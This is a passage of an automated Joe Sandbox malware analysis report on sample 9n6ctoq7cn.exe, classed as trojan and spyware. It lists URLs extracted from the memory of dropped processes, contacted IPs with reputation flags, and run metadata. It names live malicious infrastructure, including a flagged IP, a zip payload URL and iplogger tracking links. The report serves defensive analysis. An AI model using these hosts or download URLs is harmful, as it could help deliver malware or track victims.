http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	brokerius.exe, 0000001A.00000003.605445973.00000000282AF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24Response	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	F0geI.exe, 0000000F.00000003.421251499.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765882444.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765441627.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761541749.0000000004409000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.768912087.00000000045AE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.758795578.0000000004370000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.777831503.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.739330600.0000000003517000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.742995349.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761957276.0000000004426000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.769697064.00000000045CB000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768355950.000000000426D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.764514321.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782196306.000000000447C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.775000832.0000000004380000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.773023876.0000000004324000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.776863060.000000000439D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.745231042.0000000003354000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782612989.0000000004499000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768877468.000000000428A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.765224204.00000000041D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	false		high
http://62.204.41.126:80	9n6ctoq7cn.exe, me.exe, 0000001D.00000000.406600715.0000000000D23000.00000002.00000001.01000000.00000012.sdmp, me.exe, 0000001D.00000002.693545020.0000000000D23000.00000002.00000001.01000000.00000012.sdmp	true	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	false		high
http://77.91.103.222:80/8938201687.zip	real.exe, 00000017.00000002.460941633.000000000059D000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id5Response	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.756456423.0000000003844000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.761032896.0000000003633000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.743283240.00000000035F5000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.753380323.0000000003498000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8Response	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.757934198.0000000003899000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cutt.ly	SETUP_~1.EXE, 00000027.00000002.724618410.00000000028F6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://iplogger.org/1ARX	9n6ctoq7cn.exe, 00000000.00000003.407162187.00000000020E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://iplogger.org/1AVmX4C:	9n6ctoq7cn.exe, 00000000.00000002.421618952.0000000000505000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/06/addressingex	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro	real.exe, 00000017.00000002.559425106.0000000027F5C000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.588383211.00000000282B8000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.681359563.0000000028594000.00000004.00000800.00020000.00000000.sdmp	false		high
https://t.me/v_total	brokerius.exe, 0000001A.00000003.588632092.00000000011C0000.00000004.00000020.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000000.395822008.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp, brokerius.exe, 0000001A.00000002.637138430.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp	false		high
https://www.google.com/intl/en_uk/chrome/	real.exe, 00000017.00000002.559425106.0000000027F5C000.00000004.00000800.00020000.00000000.sdmp, real.exe, 00000017.00000002.559597055.0000000028064000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.588345327.00000000282AD000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.681486509.0000000028696000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000003.588383211.00000000282B8000.00000004.00000800.00020000.00000000.sdmp, brokerius.exe, 0000001A.00000002.681359563.0000000028594000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://cdn.discordapp.com	SETUP_~1.EXE, 00000027.00000002.726536828.000000000292C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://mas.to/	brokerius.exe, 0000001A.00000000.395822008.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp, brokerius.exe, 0000001A.00000002.637138430.0000000000B94000.00000002.00000001.01000000.0000000D.sdmp	false	URL Reputation: safe	unknown
http://www.company.com/83886080NewProduct000100NewProduct1NewProduct	9n6ctoq7cn.exe	false		high
http://tempuri.org/Entity/Id13Response	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.743283240.00000000035F5000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.753380323.0000000003498000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
https://iplogger.org/1ARmX40100https://iplogger.org/1AAmX40100https://iplogger.org/1AFmX40100https:/	9n6ctoq7cn.exe	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	F0geI.exe, 0000000F.00000003.421251499.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765882444.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765441627.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761541749.0000000004409000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.768912087.00000000045AE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.758795578.0000000004370000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.777831503.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.739330600.0000000003517000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.742995349.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761957276.0000000004426000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.769697064.00000000045CB000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768355950.000000000426D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.764514321.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782196306.000000000447C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.775000832.0000000004380000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.773023876.0000000004324000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.776863060.000000000439D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.745231042.0000000003354000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782612989.0000000004499000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768877468.000000000428A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.765224204.00000000041D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	namdoitntn.exe, 00000015.00000002.717455310.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.728540207.0000000003341000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2002/12/policy	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id22Response	safert44.exe, 00000018.00000002.757934198.0000000003899000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.734536713.0000000003101000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.761032896.0000000003633000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	F0geI.exe, 0000000F.00000003.421251499.0000000003CBE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765882444.00000000044DD000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.765441627.00000000044C0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761541749.0000000004409000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.768912087.00000000045AE000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.758795578.0000000004370000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.777831503.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.739330600.0000000003517000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.742995349.00000000035E8000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.761957276.0000000004426000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.769697064.00000000045CB000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768355950.000000000426D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.764514321.00000000041B6000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782196306.000000000447C000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.775000832.0000000004380000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.773023876.0000000004324000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.776863060.000000000439D000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.745231042.0000000003354000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.782612989.0000000004499000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.768877468.000000000428A000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.765224204.00000000041D3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/Issue	namdoitntn.exe, 00000015.00000002.722310179.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, safert44.exe, 00000018.00000002.731514255.00000000033D4000.00000004.00000800.00020000.00000000.sdmp, jshainx.exe, 00000019.00000002.736965467.0000000003191000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
77.91.103.222	unknown	Russian Federation	42861	FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU	false
216.58.209.42	unknown	United States	15169	GOOGLEUS	false
142.251.209.4	www.google.com	United States	15169	GOOGLEUS	false
45.95.11.158	unknown	Italy	13487	ULTRA-PACKETUS	true
88.198.122.116	unknown	Germany	24940	HETZNER-ASDE	false
216.58.209.46	clients.l.google.com	United States	15169	GOOGLEUS	false
216.58.209.35	unknown	United States	15169	GOOGLEUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
162.159.133.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
103.89.90.61	unknown	Viet Nam	135905	VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
148.251.234.83	iplogger.org	Germany	24940	HETZNER-ASDE	false
195.54.170.157	unknown	unknown	51171	VALICOM-ASPT	false
104.22.0.232	cutt.ly	United States	13335	CLOUDFLARENETUS	false
142.250.180.141	accounts.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	688970
Start date and time:	2022-08-23 18:21:58 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 20m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	9n6ctoq7cn.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	51
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@122/190@15/17
EGA Information:	Successful, ratio: 66.7%
HDC Information:	Successful, ratio: 13.3% (good quality ratio 9.1%) Quality average: 33.3% Quality standard deviation: 29.4%
HCA Information:	Successful, ratio: 100% Number of executed functions: 61 Number of non-executed functions: 165
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI Sleeps bigger than 300000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.251.209.3, 142.250.184.78, 173.194.10.104
Excluded domains from analysis (whitelisted): r1---sn-4g5e6ns6.gvt1.com, client.wns.windows.com, redirector.gvt1.com, r3---sn-4g5ednkl.gvt1.com, ctldl.windowsupdate.com, clientservices.googleapis.com, arc.msn.com
Execution Graph export aborted for target 9n6ctoq7cn.exe, PID 5608 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
